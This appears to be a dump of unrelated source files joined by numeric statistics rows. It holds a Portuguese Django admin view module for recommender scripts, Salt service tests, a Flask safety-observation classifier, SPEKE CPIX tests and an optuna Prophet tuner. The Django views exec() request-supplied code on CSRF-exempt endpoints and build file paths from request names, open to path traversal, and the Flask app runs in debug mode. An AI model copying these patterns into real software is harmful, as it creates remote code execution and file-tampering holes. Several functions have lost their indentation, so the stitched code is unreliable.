        dir_path = dir_path.replace('alarm','webapp/algorithms/'+ fileName + '.py')
        try:
            # Smoke-test: define the submitted function and call it once
            # with the request and a random Post.
            exec('from random import randint\n'+codigo+'\n'+'count = Post.objects.count()\n'+'random_object = Post.objects.all()[randint(0, count - 1)]\n'+fileName+'(request,random_object)')
        except Exception as ex:
            return HttpResponse(json.dumps({"type":type(ex).__name__ , "args" : str(ex.args)}),status=404)
        else:
            if not os.path.exists(dir_path):
                # NOTE(review): file handle is never closed — consider `with`.
                file = open(dir_path, "w+")
                file.write(codigo)
                novoRecomendador = Adapters(fileName,1)
                novoRecomendador.save()
                return HttpResponse(status=204)
            return HttpResponse(json.dumps({"type":"Arquivo já existente com este nome" , "args" : "Mude-o!"}),status=404)
    else:
        return render(request,"admin/code-editor/code-editor.html")
@login_required(login_url='../admin/login/')
@csrf_exempt
def toggleRecommendator(request):
if(request.method == 'POST'):
data = json.loads(request.body.decode('UTF-8'))
name = data["nome"]
value = data["value"]
element = Adapters.objects.get(rid=name)
element.ativo = value
element.save()
return HttpResponse(status=204)
else:
lista = Adapters.objects.values()
adap = {}
for i in lista:
adap.update({i["rid"]:[str(i["ativo"])]})
return JsonResponse(adap)
@login_required(login_url='../admin/login/')
@csrf_exempt
def deleteRecommendator(request):
    """Delete a recommender: its source file (if present) and its Adapters row.

    POST body: JSON {"name": <rid>}.  Responds 204 when both the file and
    the DB row were removed, 404 when no DB row exists, 200 otherwise
    (including plain GETs).
    """
    if request.method == 'POST':
        data = json.loads(request.body.decode('UTF-8'))
        fileName = data["name"]  # rid of the recommender to remove
        dir_path = os.path.dirname(os.path.realpath(__file__))
        dir_path = dir_path.replace('alarm', 'webapp/algorithms/' + fileName + '.py')
        if os.path.exists(dir_path):
            os.remove(dir_path)
            Adapters.objects.get(rid=fileName).delete()
            return HttpResponse(status=204)
        # No source file on disk: still try to drop the DB row.
        try:
            Adapters.objects.get(rid=fileName).delete()
        except Exception:
            # Was a bare `except:` — narrowed so KeyboardInterrupt/SystemExit
            # are not swallowed; a missing row still maps to 404.
            return HttpResponse(status=404)
    return HttpResponse(status=200)
@login_required(login_url='../admin/login/')
@csrf_exempt
def visulizarRecommendator(request):
if (request.method == 'POST'):
data = json.loads(request.body.decode('UTF-8'))
fileName = data["name"] # contem o nome do recomendador a ser visualizado
dir_path = os.path.dirname(os.path.realpath(__file__))
dir_path = dir_path.replace('alarm','webapp/algorithms/'+ fileName + '.py')
if os.path.exists(dir_path):
file = open(dir_path, "r")
conteudo = {"conteudo":file.read(), "nome":fileName}
return JsonResponse(conteudo)
return HttpResponse(status=404)
return HttpResponse(status=200)
@login_required(login_url='../admin/login/')
def managercodes(request):
return render(request,"admin/toggle/toggleRecomender.html")
@login_required(login_url='../admin/login/')
def recomendacaoGerada(request):
return render(request,"admin/graficos/recomendacaogerada/recomendacaogerada.html")
@login_required(login_url='../admin/login/')
def recomendacaoAcessada(request):
return render(request,"admin/graficos/recomendacaoacessada/recomendacaoacessada.html")
@login_required(login_url='../admin/login/')
def recomendacaoAderida(request):
return render(request,"admin/graficos/recomendacaoaderida/recomendacaoaderida.html")
@login_required(login_url='../admin/login/')
def recomendacaoAderidaPorGeracao(request):
return render(request,"admin/graficos/recomendacaoaderidaporgeracao/recomendacaoaderidaporgeracao.html")
@login_required(login_url='../admin/login/')
def recomendacaoEficiencia(request):
return render(request,"admin/graficos/recomendacaoeficiencia/recomendacaoeficiencia.html")
| 37.444724
| 184
| 0.699993
| 1,833
| 14,903
| 5.580469
| 0.102564
| 0.054649
| 0.049272
| 0.057484
| 0.809757
| 0.787271
| 0.759605
| 0.753837
| 0.723433
| 0.704468
| 0
| 0.008219
| 0.14279
| 14,903
| 397
| 185
| 37.539043
| 0.792485
| 0.006173
| 0
| 0.757143
| 0
| 0
| 0.098933
| 0.031267
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.022857
| 0.02
| 0.205714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2bf598822763c56499c7ef1203a3352f3f11b44a
| 479
|
py
|
Python
|
tests/test_concourse-ci.py
|
mbools/concourseci-formula
|
45e702eaf889206aac3906607a2396a8d9a07bb1
|
[
"Apache-2.0"
] | null | null | null |
tests/test_concourse-ci.py
|
mbools/concourseci-formula
|
45e702eaf889206aac3906607a2396a8d9a07bb1
|
[
"Apache-2.0"
] | 1
|
2018-03-09T13:48:31.000Z
|
2018-03-09T13:48:31.000Z
|
tests/test_concourse-ci.py
|
mbools/concourseci-formula
|
45e702eaf889206aac3906607a2396a8d9a07bb1
|
[
"Apache-2.0"
] | 3
|
2018-10-07T11:15:04.000Z
|
2021-03-04T09:46:17.000Z
|
"""Use testinfra and py.test to verify formula works properly"""
def test_concourse_server_running_and_enabled(Service, Salt):
    """Assert the concourse *server* service (name taken from the
    'concourse-ci:server:service:name' pillar) is running and enabled."""
    concourse = Service(Salt("pillar.get", "concourse-ci:server:service:name"))
    assert concourse.is_running
    assert concourse.is_enabled
def test_concourse_worker_running_and_enabled(Service, Salt):
    """Assert the concourse *worker* service (name taken from the
    'concourse-ci:worker:service:name' pillar) is running and enabled."""
    concourse = Service(Salt("pillar.get", "concourse-ci:worker:service:name"))
    assert concourse.is_running
    assert concourse.is_enabled
| 39.916667
| 79
| 0.778706
| 64
| 479
| 5.609375
| 0.375
| 0.122563
| 0.189415
| 0.133705
| 0.707521
| 0.707521
| 0.707521
| 0.707521
| 0.707521
| 0.707521
| 0
| 0
| 0.118998
| 479
| 11
| 80
| 43.545455
| 0.850711
| 0.121086
| 0
| 0.5
| 0
| 0
| 0.20241
| 0.154217
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| false
| 0
| 0
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
921468e582bce2ff6b517fdb80d1a1967cd5e240
| 12,848
|
py
|
Python
|
app.py
|
HrishikeshGadekar/Construction-Safety-Observations-Analyzer
|
32567d13e83831c54ca8ee0fa80b72effe274c45
|
[
"Apache-2.0"
] | null | null | null |
app.py
|
HrishikeshGadekar/Construction-Safety-Observations-Analyzer
|
32567d13e83831c54ca8ee0fa80b72effe274c45
|
[
"Apache-2.0"
] | null | null | null |
app.py
|
HrishikeshGadekar/Construction-Safety-Observations-Analyzer
|
32567d13e83831c54ca8ee0fa80b72effe274c45
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from flask import Flask, request, render_template
from sklearn.feature_extraction.text import TfidfVectorizer
import pickle
app = Flask(__name__)
# read our pickle file and label LR Ngram (1, 4) as model
model = pickle.load(open('model1_4.pkl', 'rb'))
# read our pickle file and label LR Ngram (2, 4) as model2
model2 = pickle.load(open('model2_4.pkl', 'rb'))
# # read our pickle file and label LSVM Ngram (1, 4) as model
# model = pickle.load(open('lsvmmodel1_4.pkl', 'rb'))
# # read our pickle file and label LSVM Ngram (2, 4) as model2
# model2 = pickle.load(open('lsvmmodel2_4.pkl', 'rb'))
@app.route('/')
def home():
    """Render the landing page with the observation input form."""
    return render_template('index.html')
# Sentinel confidence scores both models emit for unrecognized/empty input.
# NOTE(review): exact float equality against empirically-observed constants is
# fragile — confirm these sentinels and prefer explicit input validation
# (e.g. reject blank text before calling the model).
_INVALID_PROBS = (0.08765182261021813, 0.1355507998162925, 0.7767973775734893)

_INVALID_TEXT = '---> This is an Invalid Input. Please try again.'

# User-facing result templates keyed by predicted class label
# (0 = Good Observation, 1 = Unsafe Act, 2 = Unsafe Condition).
_CLASS_TEXTS = {
    0: '---> This is a Good Observation!\n The Prediction Confidence for each class are-\n GO: {},\n UA: {},\n UC: {}',
    1: '---> This is an Unsafe Act !!\nThe Prediction Confidence for each class are- \n GO: {}, UA: {}, UC: {}',
    2: '---> This is an Unsafe Condition !!\nThe Prediction Confidence for each class are- \n GO: {}, UA: {}, UC: {}',
}


def _result_text(label, probs):
    """Render the message for one model's prediction.

    label -- predicted class (0/1/2); anything else falls back to the
             invalid-input message (the original returned None -> HTTP 500).
    probs -- (GO, UA, UC) confidence scores for the three classes.
    """
    # Any sentinel match means the model saw invalid/unknown input.
    if any(p == sentinel for p, sentinel in zip(probs, _INVALID_PROBS)):
        return _INVALID_TEXT
    template = _CLASS_TEXTS.get(label)
    if template is None:
        # Defensive fallback for an unexpected label value.
        return _INVALID_TEXT
    return template.format(*probs)


@app.route('/predict', methods=['POST', 'GET'])
def predict():
    """Classify the submitted safety observation with both n-gram models.

    Renders index.html with the original input plus one verdict per model:
    prediction_text for the (1, 4) n-gram model, prediction_text2 for the
    (2, 4) model. Behavior-preserving rewrite of the original 100+-line
    if/elif pyramid; predict_proba is now called once per model instead of
    three times.
    """
    # assumes the form carries a single 'Safety Observation' text field —
    # the models score that one document.
    observation = list(request.form.values())
    probs1 = tuple(model.predict_proba(observation)[0])
    probs2 = tuple(model2.predict_proba(observation)[0])
    label1 = int(model.predict(observation)[0])
    label2 = int(model2.predict(observation)[0])
    return render_template(
        'index.html',
        inp='Input: {}'.format(request.form.to_dict(flat=True)['Safety Observation']),
        prediction_text=_result_text(label1, probs1),
        prediction_text2=_result_text(label2, probs2),
    )
if __name__ == "__main__":
    # Development server only: debug=True enables the interactive debugger
    # and auto-reload; never expose it publicly — use a WSGI server instead.
    app.run(debug=True)
| 82.890323
| 248
| 0.574019
| 1,469
| 12,848
| 4.83322
| 0.071477
| 0.209577
| 0.119718
| 0.091268
| 0.942676
| 0.938592
| 0.915211
| 0.915211
| 0.885211
| 0.845634
| 0
| 0.05322
| 0.296544
| 12,848
| 154
| 249
| 83.428571
| 0.732352
| 0.03339
| 0
| 0.655738
| 0
| 0.196721
| 0.29577
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016393
| false
| 0
| 0.032787
| 0.008197
| 0.188525
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a611dc8a7d3c8589716aa2a8b4b2a98631552a8c
| 105
|
py
|
Python
|
lib/solutions/HLO/test_hello.py
|
DPNT-Sourcecode/CHK-xelm01
|
316e2358a71e8ef3e8bdea0e2a5b0b4b19d13fbe
|
[
"Apache-2.0"
] | null | null | null |
lib/solutions/HLO/test_hello.py
|
DPNT-Sourcecode/CHK-xelm01
|
316e2358a71e8ef3e8bdea0e2a5b0b4b19d13fbe
|
[
"Apache-2.0"
] | null | null | null |
lib/solutions/HLO/test_hello.py
|
DPNT-Sourcecode/CHK-xelm01
|
316e2358a71e8ef3e8bdea0e2a5b0b4b19d13fbe
|
[
"Apache-2.0"
] | null | null | null |
from .hello_solution import hello
def test_hello_name():
    """hello() greets the supplied name with the canonical punctuation."""
    expected = "Hello, Raz!"
    assert hello("Raz") == expected
| 17.5
| 41
| 0.657143
| 14
| 105
| 4.714286
| 0.642857
| 0.242424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.209524
| 105
| 5
| 42
| 21
| 0.795181
| 0
| 0
| 0
| 0
| 0
| 0.14
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a62565699bc66496893e436fcd3305ad2763cc2d
| 6,264
|
py
|
Python
|
spekev2_verification_testsuite/test_case_5_preset_video_2_audio_unencrypted.py
|
amphied/speke-reference-server
|
7b589a333fb3c619c6f7e53483d43de9a588f7b7
|
[
"Apache-2.0"
] | null | null | null |
spekev2_verification_testsuite/test_case_5_preset_video_2_audio_unencrypted.py
|
amphied/speke-reference-server
|
7b589a333fb3c619c6f7e53483d43de9a588f7b7
|
[
"Apache-2.0"
] | null | null | null |
spekev2_verification_testsuite/test_case_5_preset_video_2_audio_unencrypted.py
|
amphied/speke-reference-server
|
7b589a333fb3c619c6f7e53483d43de9a588f7b7
|
[
"Apache-2.0"
] | null | null | null |
import pytest
from .helpers import utils, speke_element_assertions
import xml.etree.ElementTree as ET
@pytest.fixture(scope="session")
def widevine_response(spekev2_url):
    """Session-cached SPEKE response for test case 5, Widevine-only preset."""
    presets = utils.PRESETS_WIDEVINE
    return utils.send_speke_request(utils.TEST_CASE_5_P_V_2_A_UNENC, presets, spekev2_url)
@pytest.fixture(scope="session")
def playready_response(spekev2_url):
    """Session-cached SPEKE response for test case 5, PlayReady-only preset."""
    presets = utils.PRESETS_PLAYREADY
    return utils.send_speke_request(utils.TEST_CASE_5_P_V_2_A_UNENC, presets, spekev2_url)
@pytest.fixture(scope="session")
def fairplay_response(spekev2_url):
    """Session-cached SPEKE response for test case 5, FairPlay-only preset."""
    presets = utils.PRESETS_FAIRPLAY
    return utils.send_speke_request(utils.TEST_CASE_5_P_V_2_A_UNENC, presets, spekev2_url)
@pytest.fixture(scope="session")
def widevine_playready_response(spekev2_url):
    """Session-cached SPEKE response for the Widevine+PlayReady preset."""
    presets = utils.PRESETS_WIDEVINE_PLAYREADY
    return utils.send_speke_request(utils.TEST_CASE_5_P_V_2_A_UNENC, presets, spekev2_url)
@pytest.fixture(scope="session")
def widevine_fairplay_response(spekev2_url):
    """Session-cached SPEKE response for the Widevine+FairPlay preset."""
    presets = utils.PRESETS_WIDEVINE_FAIRPLAY
    return utils.send_speke_request(utils.TEST_CASE_5_P_V_2_A_UNENC, presets, spekev2_url)
@pytest.fixture(scope="session")
def playready_fairplay_response(spekev2_url):
    """Session-cached SPEKE response for the PlayReady+FairPlay preset."""
    presets = utils.PRESETS_PLAYREADY_FAIRPLAY
    return utils.send_speke_request(utils.TEST_CASE_5_P_V_2_A_UNENC, presets, spekev2_url)
@pytest.fixture(scope="session")
def widevine_playready_fairplay_response(spekev2_url):
    """Session-cached SPEKE response for the all-three-DRM preset."""
    presets = utils.PRESETS_WIDEVINE_PLAYREADY_FAIRPLAY
    return utils.send_speke_request(utils.TEST_CASE_5_P_V_2_A_UNENC, presets, spekev2_url)
def test_case_5_widevine(widevine_response):
    """Validate CPIX structure of the Widevine-only response (cenc scheme)."""
    assertions = speke_element_assertions
    cpix = ET.fromstring(widevine_response)
    assertions.check_cpix_version(cpix)
    assertions.validate_root_element(cpix)
    assertions.validate_mandatory_cpix_child_elements(cpix)
    assertions.validate_content_key_list_element(cpix, 2, "cenc")
    assertions.validate_drm_system_list_element(cpix, 2, 2, 2, 0, 0)
    assertions.validate_content_key_usage_rule_list_element(cpix, 2)
    assertions.validate_content_key_usage_rule_list_for_unencrypted_presets(cpix, "audio")
def test_case_5_playready(playready_response):
    """Validate CPIX structure of the PlayReady-only response (cenc scheme)."""
    assertions = speke_element_assertions
    cpix = ET.fromstring(playready_response)
    assertions.check_cpix_version(cpix)
    assertions.validate_root_element(cpix)
    assertions.validate_mandatory_cpix_child_elements(cpix)
    assertions.validate_content_key_list_element(cpix, 2, "cenc")
    assertions.validate_drm_system_list_element(cpix, 2, 2, 0, 2, 0)
    assertions.validate_content_key_usage_rule_list_element(cpix, 2)
    assertions.validate_content_key_usage_rule_list_for_unencrypted_presets(cpix, "audio")
def test_case_5_fairplay(fairplay_response):
    """Validate CPIX structure of the FairPlay-only response (cbcs scheme)."""
    assertions = speke_element_assertions
    cpix = ET.fromstring(fairplay_response)
    assertions.check_cpix_version(cpix)
    assertions.validate_root_element(cpix)
    assertions.validate_mandatory_cpix_child_elements(cpix)
    assertions.validate_content_key_list_element(cpix, 2, "cbcs")
    assertions.validate_drm_system_list_element(cpix, 2, 2, 0, 0, 2)
    assertions.validate_content_key_usage_rule_list_element(cpix, 2)
    assertions.validate_content_key_usage_rule_list_for_unencrypted_presets(cpix, "audio")
def test_case_5_widevine_playready(widevine_playready_response):
    """Validate CPIX structure of the Widevine+PlayReady response (cenc)."""
    assertions = speke_element_assertions
    cpix = ET.fromstring(widevine_playready_response)
    assertions.check_cpix_version(cpix)
    assertions.validate_root_element(cpix)
    assertions.validate_mandatory_cpix_child_elements(cpix)
    assertions.validate_content_key_list_element(cpix, 2, "cenc")
    assertions.validate_drm_system_list_element(cpix, 4, 2, 2, 2, 0)
    assertions.validate_content_key_usage_rule_list_element(cpix, 2)
    assertions.validate_content_key_usage_rule_list_for_unencrypted_presets(cpix, "audio")
def test_case_5_widevine_fairplay(widevine_fairplay_response):
    """Validate CPIX structure of the Widevine+FairPlay response (cbcs)."""
    assertions = speke_element_assertions
    cpix = ET.fromstring(widevine_fairplay_response)
    assertions.check_cpix_version(cpix)
    assertions.validate_root_element(cpix)
    assertions.validate_mandatory_cpix_child_elements(cpix)
    assertions.validate_content_key_list_element(cpix, 2, "cbcs")
    assertions.validate_drm_system_list_element(cpix, 4, 2, 2, 0, 2)
    assertions.validate_content_key_usage_rule_list_element(cpix, 2)
    assertions.validate_content_key_usage_rule_list_for_unencrypted_presets(cpix, "audio")
def test_case_5_playready_fairplay(playready_fairplay_response):
    """Validate CPIX structure of the PlayReady+FairPlay response (cbcs)."""
    assertions = speke_element_assertions
    cpix = ET.fromstring(playready_fairplay_response)
    assertions.check_cpix_version(cpix)
    assertions.validate_root_element(cpix)
    assertions.validate_mandatory_cpix_child_elements(cpix)
    assertions.validate_content_key_list_element(cpix, 2, "cbcs")
    assertions.validate_drm_system_list_element(cpix, 4, 2, 0, 2, 2)
    assertions.validate_content_key_usage_rule_list_element(cpix, 2)
    assertions.validate_content_key_usage_rule_list_for_unencrypted_presets(cpix, "audio")
def test_case_5_widevine_playready_fairplay(widevine_playready_fairplay_response):
    """Validate CPIX structure of the all-three-DRM response (cbcs)."""
    assertions = speke_element_assertions
    cpix = ET.fromstring(widevine_playready_fairplay_response)
    assertions.check_cpix_version(cpix)
    assertions.validate_root_element(cpix)
    assertions.validate_mandatory_cpix_child_elements(cpix)
    assertions.validate_content_key_list_element(cpix, 2, "cbcs")
    assertions.validate_drm_system_list_element(cpix, 6, 2, 2, 2, 2)
    assertions.validate_content_key_usage_rule_list_element(cpix, 2)
    assertions.validate_content_key_usage_rule_list_for_unencrypted_presets(cpix, "audio")
| 50.112
| 124
| 0.855364
| 894
| 6,264
| 5.414989
| 0.065996
| 0.092543
| 0.227226
| 0.260277
| 0.964264
| 0.960132
| 0.928321
| 0.891551
| 0.856848
| 0.856848
| 0
| 0.014563
| 0.079183
| 6,264
| 124
| 125
| 50.516129
| 0.824723
| 0
| 0
| 0.563218
| 0
| 0
| 0.017886
| 0
| 0
| 0
| 0
| 0
| 0.574713
| 1
| 0.16092
| false
| 0
| 0.034483
| 0.08046
| 0.275862
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a699ae1a93e1ae038d689ac23ff2015712a89146
| 9,984
|
py
|
Python
|
src/Final-NeuralFBProphet/optim/bayesian.py
|
ds-wook/Final-NeuralFBProphet
|
0cb44bfa0ca1ea49077e29bce4d34af2c6a4d618
|
[
"Apache-2.0"
] | 16
|
2021-04-29T13:27:37.000Z
|
2021-12-30T00:19:00.000Z
|
src/Final-NeuralFBProphet/optim/bayesian.py
|
ds-wook/Final-NeuralFBProphet
|
0cb44bfa0ca1ea49077e29bce4d34af2c6a4d618
|
[
"Apache-2.0"
] | null | null | null |
src/Final-NeuralFBProphet/optim/bayesian.py
|
ds-wook/Final-NeuralFBProphet
|
0cb44bfa0ca1ea49077e29bce4d34af2c6a4d618
|
[
"Apache-2.0"
] | 3
|
2021-05-20T04:05:15.000Z
|
2021-05-20T04:12:40.000Z
|
from typing import Callable
import joblib
import optuna
import pandas as pd
from fbprophet import Prophet
from optuna import Trial
from optuna.samplers import TPESampler
from sklearn.metrics import mean_squared_error
class BayesianOptimizer:
    """Thin wrapper around an optuna TPE study for Prophet hyperparameter tuning."""

    def __init__(self, objective_function: Callable):
        # Objective minimized by the study; called once per trial.
        self.objective_function = objective_function

    def build_study(self, trials: int, verbose: bool = False):
        """Run a TPE-sampled study minimizing the objective for `trials` trials.

        Returns the completed optuna study; prints best score/params when
        `verbose` is True.
        """
        sampler = TPESampler(seed=42)  # fixed seed -> reproducible searches
        study = optuna.create_study(
            study_name="TPE hyperparameter",
            direction="minimize",
            sampler=sampler,
        )
        study.optimize(self.objective_function, n_trials=trials)
        if verbose:
            self.display_study_statistics(study)
        return study

    @staticmethod
    def display_study_statistics(study: optuna.Study):
        """Print the study's best score and best trial parameters.

        BUG FIX: this was defined without `self` but not marked
        @staticmethod, so `self.display_study_statistics(study)` in
        build_study raised TypeError (two positional arguments).
        """
        print("Best Score:", study.best_value)
        print("Best trial:", study.best_trial.params)

    @staticmethod
    def save_params(study: optuna.Study, params_name: str):
        """Persist the best trial's params to ../../parameters/<params_name>."""
        params = study.best_trial.params
        joblib.dump(params, "../../parameters/" + params_name)

    @staticmethod
    def save_two_params(study: optuna.Study, params_name: str):
        """Persist best params augmented with the fixed Prophet settings."""
        prophet_params = study.best_params
        prophet_params["growth"] = "logistic"
        prophet_params["seasonality_mode"] = "additive"
        prophet_params["weekly_seasonality"] = True
        prophet_params["daily_seasonality"] = True
        prophet_params["yearly_seasonality"] = False
        joblib.dump(prophet_params, "../../parameters/" + params_name)

    @staticmethod
    def plot_optimization_history(study: optuna.Study):
        """Return optuna's optimization-history figure for `study`."""
        return optuna.visualization.plot_optimization_history(study)

    @staticmethod
    def plot_param_importances(study: optuna.Study):
        """Return optuna's hyperparameter-importance figure for `study`."""
        return optuna.visualization.plot_param_importances(study)

    @staticmethod
    def plot_edf(study: optuna.Study):
        """Return optuna's empirical-distribution-function figure for `study`."""
        return optuna.visualization.plot_edf(study)
def ontune_prophet_objective(
    train: pd.DataFrame, valid: pd.Series, cap: float, floor: float
) -> Callable[[Trial], float]:
    """Build an optuna objective tuning Prophet on the ontune series.

    train -- history frame (assumes Prophet's ds/y columns — TODO confirm);
             cap/floor columns are added in place for logistic growth.
    valid -- held-out series whose `.y` is scored against the last 7
             forecast rows (daily frequency, 144-period horizon).
    Returns a callable for `study.optimize`; lower RMSE is better.
    """

    def objective(trial: Trial) -> float:
        # Search space: changepoint behavior, global seasonality prior, and
        # per-seasonality Fourier orders / prior scales.
        params = {
            "changepoint_range": trial.suggest_discrete_uniform(
                "changepoint_range", 0.8, 0.95, 0.001
            ),
            "n_changepoints": trial.suggest_int("n_changepoints", 20, 35),
            "changepoint_prior_scale": trial.suggest_discrete_uniform(
                "changepoint_prior_scale", 0.001, 0.5, 0.001
            ),
            "seasonality_prior_scale": trial.suggest_discrete_uniform(
                "seasonality_prior_scale", 1, 25, 0.5
            ),
            "yearly_fourier": trial.suggest_int("yearly_fourier", 5, 15),
            "monthly_fourier": trial.suggest_int("monthly_fourier", 3, 12),
            "weekly_fourier": trial.suggest_int("weekly_fourier", 3, 7),
            "quaterly_fourier": trial.suggest_int("quaterly_fourier", 3, 10),
            "yearly_prior": trial.suggest_discrete_uniform("yearly_prior", 1, 25, 0.5),
            "monthly_prior": trial.suggest_discrete_uniform(
                "monthly_prior", 1, 25, 0.5
            ),
            "weekly_prior": trial.suggest_discrete_uniform("weekly_prior", 1, 25, 0.5),
            "quaterly_prior": trial.suggest_discrete_uniform(
                "quaterly_prior", 1, 25, 0.5
            ),
        }
        # Fixed settings (growth/seasonality mode) are passed to Prophet
        # directly; the original also stored them as dead dict entries.
        model = Prophet(
            # BUG FIX: changepoint_range previously received
            # params["changepoint_prior_scale"], so the tuned
            # "changepoint_range" value was silently ignored.
            changepoint_range=params["changepoint_range"],
            n_changepoints=params["n_changepoints"],
            changepoint_prior_scale=params["changepoint_prior_scale"],
            seasonality_prior_scale=params["seasonality_prior_scale"],
            yearly_seasonality=False,
            weekly_seasonality=True,
            daily_seasonality=True,
            growth="logistic",
            seasonality_mode="additive",
        )
        # Custom seasonalities with tuned Fourier orders and prior scales.
        for name, period in (
            ("yearly", 365.25),
            ("monthly", 30.5),
            ("weekly", 7),
            ("quaterly", 365.25 / 4),
        ):
            model.add_seasonality(
                name=name,
                period=period,
                fourier_order=params[name + "_fourier"],
                prior_scale=params[name + "_prior"],
            )
        train["cap"] = cap
        train["floor"] = floor
        model.fit(train)
        future = model.make_future_dataframe(periods=144, freq="d")
        future["cap"] = cap
        future["floor"] = floor
        forecast = model.predict(future)
        valid_forecast = forecast.tail(7)
        return mean_squared_error(valid.y, valid_forecast.yhat, squared=False)

    return objective
def vcenter_prophet_objective(
    train: pd.DataFrame, valid: pd.Series, cap: float, floor: float
) -> Callable[[Trial], float]:
    """Build an optuna objective tuning Prophet on the vcenter series.

    Identical search space and scoring to ontune_prophet_objective
    (7-row RMSE on a 144-period daily forecast); kept as a separate entry
    point for per-series studies.
    """

    def objective(trial: Trial) -> float:
        # Search space: changepoint behavior, global seasonality prior, and
        # per-seasonality Fourier orders / prior scales.
        params = {
            "changepoint_range": trial.suggest_discrete_uniform(
                "changepoint_range", 0.8, 0.95, 0.001
            ),
            "n_changepoints": trial.suggest_int("n_changepoints", 20, 35),
            "changepoint_prior_scale": trial.suggest_discrete_uniform(
                "changepoint_prior_scale", 0.001, 0.5, 0.001
            ),
            "seasonality_prior_scale": trial.suggest_discrete_uniform(
                "seasonality_prior_scale", 1, 25, 0.5
            ),
            "yearly_fourier": trial.suggest_int("yearly_fourier", 5, 15),
            "monthly_fourier": trial.suggest_int("monthly_fourier", 3, 12),
            "weekly_fourier": trial.suggest_int("weekly_fourier", 3, 7),
            "quaterly_fourier": trial.suggest_int("quaterly_fourier", 3, 10),
            "yearly_prior": trial.suggest_discrete_uniform("yearly_prior", 1, 25, 0.5),
            "monthly_prior": trial.suggest_discrete_uniform(
                "monthly_prior", 1, 25, 0.5
            ),
            "weekly_prior": trial.suggest_discrete_uniform("weekly_prior", 1, 25, 0.5),
            "quaterly_prior": trial.suggest_discrete_uniform(
                "quaterly_prior", 1, 25, 0.5
            ),
        }
        model = Prophet(
            # BUG FIX: changepoint_range previously received
            # params["changepoint_prior_scale"], so the tuned
            # "changepoint_range" value was silently ignored.
            changepoint_range=params["changepoint_range"],
            n_changepoints=params["n_changepoints"],
            changepoint_prior_scale=params["changepoint_prior_scale"],
            seasonality_prior_scale=params["seasonality_prior_scale"],
            yearly_seasonality=False,
            weekly_seasonality=True,
            daily_seasonality=True,
            growth="logistic",
            seasonality_mode="additive",
        )
        # Custom seasonalities with tuned Fourier orders and prior scales.
        for name, period in (
            ("yearly", 365.25),
            ("monthly", 30.5),
            ("weekly", 7),
            ("quaterly", 365.25 / 4),
        ):
            model.add_seasonality(
                name=name,
                period=period,
                fourier_order=params[name + "_fourier"],
                prior_scale=params[name + "_prior"],
            )
        train["cap"] = cap
        train["floor"] = floor
        model.fit(train)
        future = model.make_future_dataframe(periods=144, freq="d")
        future["cap"] = cap
        future["floor"] = floor
        forecast = model.predict(future)
        valid_forecast = forecast.tail(7)
        return mean_squared_error(valid.y, valid_forecast.yhat, squared=False)

    return objective
def two_second_prophet_objective(
    train: pd.DataFrame, valid: pd.Series, cap: float, floor: float
) -> Callable[[Trial], float]:
    """Optuna objective for the two-second series.

    Tunes Prophet's core changepoint/seasonality hyperparameters and scores
    a 163-step hourly forecast by RMSE against `valid.y`. cap/floor columns
    are added to both history and future frames for logistic growth.
    """

    def objective(trial: Trial) -> float:
        # Sampled hyperparameters plus the fixed model configuration,
        # expanded straight into the Prophet constructor.
        search_space = {
            "changepoint_range": trial.suggest_discrete_uniform(
                "changepoint_range", 0.8, 0.95, 0.001
            ),
            "n_changepoints": trial.suggest_int("n_changepoints", 20, 35),
            "changepoint_prior_scale": trial.suggest_discrete_uniform(
                "changepoint_prior_scale", 0.001, 0.5, 0.001
            ),
            "seasonality_prior_scale": trial.suggest_discrete_uniform(
                "seasonality_prior_scale", 1, 25, 0.5
            ),
            "growth": "logistic",
            "seasonality_mode": "additive",
            "yearly_seasonality": False,
            "weekly_seasonality": True,
            "daily_seasonality": True,
        }
        m = Prophet(**search_space)
        train["cap"] = cap
        train["floor"] = floor
        m.fit(train)
        future = m.make_future_dataframe(periods=163, freq="H")
        future["cap"] = cap
        future["floor"] = floor
        forecast = m.predict(future)
        horizon_tail = forecast.tail(163)
        return mean_squared_error(valid.y, horizon_tail.yhat, squared=False)

    return objective
| 36.977778
| 87
| 0.605869
| 1,044
| 9,984
| 5.522989
| 0.12931
| 0.052029
| 0.058966
| 0.079605
| 0.800035
| 0.800035
| 0.774714
| 0.76847
| 0.752862
| 0.735519
| 0
| 0.026876
| 0.284455
| 9,984
| 269
| 88
| 37.115242
| 0.780235
| 0.002905
| 0
| 0.720339
| 0
| 0
| 0.184404
| 0.041604
| 0
| 0
| 0
